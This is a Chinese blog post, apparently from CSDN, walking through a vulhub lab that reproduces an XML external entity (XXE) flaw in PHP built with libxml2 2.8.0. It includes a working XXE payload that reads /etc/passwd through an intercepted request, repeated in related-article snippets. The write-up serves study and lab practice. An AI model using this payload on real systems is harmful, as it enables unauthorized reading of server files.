PHP环境 XML外部实体注入漏洞

最新推荐文章于 2023-10-17 20:29:48 发布
最新推荐文章于 2023-10-17 20:29:48 发布
阅读量271 收藏
点赞数
文章标签: php xml 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowflake1997/article/details/123350097
版权

漏洞描述

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

影响范围

libxml2.8.0版本

复现过程

使用vulhub

cd /vulhub/php/php_xxe 进入目录

 docker-compose up -d 启动

访问

抓包,刷新一下页面就行

发送到repeater

进行修改

在最后增加上这个代码

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

这样就获取到passwd的值了

冰 雪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP环境 XML外部实体注入漏洞(XXE)
m0_46580995的博客
07-19 789
PHP环境 XML外部实体注入漏洞(XXE) 简介: PHP 7.0.30 libxml 2.8.0 复现环境vulhub exec进入docker 有三个文件 dom.php 使用DOMDocument解析body SimpleXMLElement.php 使用SimpleXMLElement类解析body simplexml_load_string.php 使用simplexml_load_string函数解析body 相应代码如下 root@e1ccaae36891:/var/www/html#
PHP XXE漏洞
weixin_30849591的博客
01-24 1093
PHP xml 外部实体注入漏洞(XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后默认解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
PHP环境 XML外部实体注入漏洞 XXE 漏洞复现
ADummy的博客
02-26 461
PHP环境 XML外部实体注入漏洞(XXE) by ADummy 0x00利用路线 ​ 构造XXE payload—>POST发送—>有回显(也有blind xxe 参考资料) 0x01漏洞介绍 ​ PHP环境 XML外部实体注入漏洞(XXE) 0x02漏洞复现 payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xx
java xml 实体注入_XML外部实体注入漏洞(XXE)
weixin_35917998的博客
02-16 1152
转自腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD根元素 [元素声明]>引...
XXE(XML外部实体注入)漏洞
2ed
08-01 900
如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它 什么是XXE 简单来说,XXE全称是——XML External Entity,就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内...
XXE漏洞-XML 外部实体注入
zeroc009的博客
02-11 2754
XXE漏洞-XML 外部实体注入xxe介绍xml基础知识新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 xxe介绍 Xml外部实体注入漏洞XML External Entity Injection)简称XXE,XXE漏洞
PHPYun XML 注入漏洞
whatiwhere的博客
12-06 1717
实验环境 实验环境 操作机系统:WindowsXP 目标网站:www.test.ichunqiu 实验目的 掌握本次漏洞的原理及其利用方法 学会如何修复Sql注入漏洞 实验工具 Hack Bar :它是火狐浏览器的一款插件,包含一些常用的工具。(SQL injection,XSS,加密等),web开发人员可以利用它,快速构建一个http请求,或者用它快速实现某种算法等,本次实验主要用到它的...
PHP 环境 XML 外部实体注入漏洞环境搭建到实操(全网最详细最齐全)
最新发布
qq_64652650的博客
10-17 291
XML 外部实体注入漏洞环境搭建到实操
libxml2 安装Php5时会提示缺少libxml2
06-06
安装Php5时会提示缺少libxml2 libxml是一个用来解析XML文档的函数库。它用C语言写成, 并且能为多种语言所调用,例如C语言,C++,XSH。C#, Python,Kylix/Delphi,Ruby,和PHP等。Perl中也可以使用XML::LibXML模块。它最初是为GNOME开发的项目,但现在可以用在各种各样的方面。libXML 代码可移植性非常好,因为它基于标准的ANSI C库, 并采用MIT许可证。
PHP xml实体注入
javaEE_zero的博客
01-05 1158
php xml实体注入php xxe漏洞
php 获取xml内容,PHP: XML 外部实体例程 - Manual
weixin_34099891的博客
03-09 104
$file="xmltest.xml";functiontrustedFile($file){//仅信任本地文件if(!preg_match("@^([a-z]+)\:\/\/@i",$file)&&fileowner($file)==getmyuid()){returntrue;}returnfalse;}functionstartElement($parser,$nam...
php无法加载外部实体,php – 加载Symfony 2应用程序时,“无法加载外部实体”进行故障排除...
weixin_42510140的博客
03-28 192
我正在尝试用symfony 2开始一个新项目,但我遇到了一些问题.当我要去/web/app_dev.php我有这个错误:InvalidArgumentException: [WARNING 1549] failed to load external entity"file://///INFO/WWW/perso/2011-2012/gdesbiey/Musique/vendor/symfony/s...
php注入 正则,PHP正则表达式漏洞下注
weixin_34917128的博客
03-09 201
没有一个步骤或完全直接的方式来利用你的代码,但这里有一些想法.你在这个例子中传递给copy(),但是你已经提到你已经使用这个方法验证文件ext了一段时间,所以我假设你有其他情况可能已经使用这个过程与其他功能在不同的PHP版本.将其视为测试程序(Exploiting include,require):$name = "test.PHP#.txt";if (preg_match('/\.(xml|cs...
php外部文件,php加载外部文件类的3.5个方法
weixin_42211324的博客
03-09 232
/*第一种方法 require:缺点就是如果加载文件过多,需要多个require*/// require('A.CLASS.PHP');// require('B.CLASS.PHP');/*第二种方法__autoloadPHP5在new 一个没有存在的类,会自动调用这个__autoload函数,____autoload只是去include_path寻找类文件并加载php中类名和函数名不区分大小写...
编译安装php5,编译安装php5的过程总结
weixin_30582757的博客
03-26 312
这次在编译php5的时候,真的体验到linux的复杂了,吃尽了苦头。在这里就总结一下。1:安装zlib,假如你编译的时候,指定路径,那么在安装gd的时候,会出现找不到zlib的错误,其实缺省安装,是把软件安装到/usr/local/lib 和/usr/local/include/ 下的。所以就采用缺省的路径就可以了。2:freetype,这个如果你编译的时候,采用缺省路径,那么你编译php的时候,...
XXE漏洞详解:XML语法、攻防策略与实战示例
XXE全称XML External Entity Injection,即XML外部实体注入攻击,是针对XML文档处理中的一种严重安全漏洞。它源于对XML语法规则的不当使用,特别是当系统处理包含外部实体引用的不安全输入时,可能导致数据泄露或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值